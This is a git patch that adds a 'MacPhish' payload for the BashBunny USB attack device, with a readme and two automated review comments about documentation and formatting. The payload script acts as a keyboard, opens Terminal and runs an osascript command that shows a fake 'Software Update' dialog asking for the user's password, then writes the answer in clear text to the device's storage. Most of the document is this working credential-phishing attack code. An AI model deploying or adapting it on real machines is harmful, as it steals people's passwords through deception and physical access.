From ca9e466ce7601774193cbeb449c09e1dba4acf56 Mon Sep 17 00:00:00 2001 From: Dan Borges Date: Fri, 7 Apr 2017 00:23:49 -0700 Subject: [PATCH] Added MacPhish payload (#70) * Adding the MacPhish payload, uses HID and STORAGE modes on BashBunny. For OS X, uses spotlight to launch terminal, then uses osascript command to phish for the users password, then saves the phished password back to the bashbunny. * Update readme.md --- payloads/library/MacPhish/payload.txt | 49 +++++++++++++++++++++++++++ payloads/library/MacPhish/readme.md | 21 ++++++++++++ 2 files changed, 70 insertions(+) create mode 100644 payloads/library/MacPhish/payload.txt create mode 100644 payloads/library/MacPhish/readme.md diff --git a/payloads/library/MacPhish/payload.txt b/payloads/library/MacPhish/payload.txt new file mode 100644 index 00000000..716ae39e --- /dev/null +++ b/payloads/library/MacPhish/payload.txt 
@@ -0,0 +1,49 @@ +#!/bin/bash +# +# Title: Mac Password Phisher +# Author: Ahhh +# Version: 1.0 +# +# Prompts for user password, writes response to the bunny +# +# Blue...............Starting +# Amber..............Executing payload +# Green..............Finished +# + +LED B + +LANGUAGE='us' +lootdir=loot/MacLoot + +# Gimme a Keyboard please. Thanks. +ATTACKMODE HID STORAGE +LED R G + +mkdir -p /root/udisk/$lootdir + +# Get a terminal +QUACK DELAY 400 +QUACK GUI SPACE +QUACK DELAY 300 +QUACK STRING terminal +QUACK DELAY 200 +QUACK ENTER +QUACK DELAY 400 + +# Make lootdir +QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/phish +QUACK ENTER +QUACK DELAY 200 +QUACK ENTER + +# Execute Payload +QUACK STRING osascript -e \'tell app \"System Preferences\" to activate\' -e \'tell app \"System Preferences\" to activate\' -e \'tell app \"System Preferences\" to display dialog \"Software Update requires that you type your password to apply changes.\" \& return \& return default answer \"\" with icon 1 with hidden answer with title \"Software Update\"\'\>/Volumes/BashBunny/$lootdir/phish/pw.txt\; sleep 20\; killall Terminal\; +QUACK ENTER +QUACK DELAY 1000 + +# Sync filesystem +sync + +# Green is the official Light of "finished" +LED G \ No newline at end of file diff --git a/payloads/library/MacPhish/readme.md b/payloads/library/MacPhish/readme.md new file mode 100644 index 00000000..df6eda03 --- /dev/null +++ b/payloads/library/MacPhish/readme.md 
@@ -0,0 +1,21 @@ +# Mac Phish + +Author: ahhh +Version: Version 1.0 + +## Description + +Credz to Fuzzynop for introducing me to the technique: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html +Using ducky script, it opens a terminal and uses the osascript command in an attempt to social engineer the root password, then saves this back to bash bunny in the loot dir + +## Configuration + +This is configured for Macbooks as a keyboard, opens terminal via spotlight + +## STATUS + +| LED | Status | +| ---------------- | ------------------------------------- | +| Blue | Setup | +| Amber | Running the scripts | +| Green | Finished |
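Review bot: In payload.txt, the header comment block says only "writes response to the bunny" and never names the file, while the keystroked command redirects the dialog result to `/Volumes/BashBunny/$lootdir/phish/pw.txt`, so the typed password ends up in clear text on the device's storage partition. Please state that path and the fact that it holds a clear-text credential in the header, so that whoever runs this in an authorized assessment can account for the file and remove it afterwards. Two smaller points in the same hunk: the `-e 'tell app "System Preferences" to activate'` argument appears twice in a row with no comment explaining why, and the file ends without a trailing newline (see the "\ No newline at end of file" marker after `LED G`).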
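Review bot: In readme.md, the Description says the payload tries to obtain "the root password", but the dialog text in payload.txt asks the user to "type your password", so what gets saved is whatever the logged-in user enters; the wording should say "the user's password". The readme also gives the destination only as "the loot dir"; it should spell out `loot/MacLoot/phish/pw.txt`, as built from `lootdir=loot/MacLoot` in the payload, and note that the content is stored in clear text. A formatting point: the "Credz to Fuzzynop" line and the "Using ducky script" line have no blank line between them, and neither do the Author and Version lines, so Markdown will render each pair as a single paragraph.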